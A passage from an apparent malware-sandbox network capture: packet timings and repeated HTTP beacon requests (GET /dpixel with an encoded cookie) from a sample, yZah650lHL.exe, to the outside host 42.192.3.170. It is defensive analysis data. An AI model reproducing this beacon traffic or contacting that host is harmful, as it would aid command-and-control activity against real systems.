                  Jan 3, 2025 02:55:39.187391996 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187407970 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187434912 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187768936 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187783957 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187793970 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187829018 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305493116 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305548906 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.305612087 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305902958 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305918932 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:40.511488914 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:40.511604071 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:40.512032986 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:40.512042999 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:40.513289928 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:40.513294935 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079471111 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079519987 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.079545975 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079566002 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079590082 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.079608917 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.080240965 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.080264091 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.080274105 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.080301046 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.266036987 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.266074896 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.266144037 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.273737907 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.273751974 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:42.477595091 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:42.477792025 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:42.478183031 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:42.478194952 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:42.481220007 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:42.481226921 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031430006 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031482935 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031501055 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031516075 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031544924 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031568050 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031800985 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031816006 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031829119 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031862974 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149056911 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149095058 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.149158001 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149458885 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149471998 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.310333967 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.310435057 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.659033060 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.659033060 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.659053087 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.659061909 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.973918915 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.973968983 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.973984003 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.974004984 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.974024057 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974037886 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974211931 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974220991 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.974240065 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974266052 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089204073 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089251041 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:45.089303970 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089826107 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089837074 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.267088890 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.267183065 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.267939091 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.267942905 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.269577026 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.269582033 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804517984 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804574966 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.804579973 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804622889 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.804637909 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804671049 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.805010080 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.805032015 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.805044889 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.805075884 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.925599098 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.925638914 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.925703049 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.926318884 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.926331043 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.134654045 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.135199070 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.136929989 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.136929989 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.136940002 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.136955023 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.701129913 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.701231003 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.703399897 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.703399897 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.703484058 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.820980072 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.821019888 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.821063042 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.821943045 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.821950912 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.040415049 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.040503025 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.040941954 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.040946960 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.047090054 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.047096014 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593255997 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593347073 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593353033 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593385935 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593409061 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593427896 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593750954 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593750954 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593765974 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593874931 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.715099096 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.715153933 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.719173908 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.719540119 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.719556093 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:51.934097052 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:51.934251070 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:51.934762955 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:51.934772968 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:51.936178923 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:51.936182976 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:52.501092911 CET4435012442.192.3.170192.168.2.4
                  • 42.192.3.170
                  Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:51:57 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:51:57 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:51:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49731 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:51:58 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:51:59 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:51:59 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49732 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:00 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:01 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:01 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49733 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:02 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:03 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:02 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49734 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:04 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:05 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:04 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49735 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:06 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:06 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:06 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49736 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:08 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:08 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:08 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:10 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:10 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:10 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:11 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:12 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:12 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:13 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:14 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:14 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:15 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:16 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:17 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:18 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:17 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:19 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:19 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:19 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:21 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:21 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:21 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:23 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:23 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:23 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49751 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:24 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:25 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:25 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:26 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
